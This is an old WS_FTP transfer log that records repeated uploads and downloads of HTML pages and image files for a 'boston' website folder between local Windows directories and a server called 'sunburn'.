10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
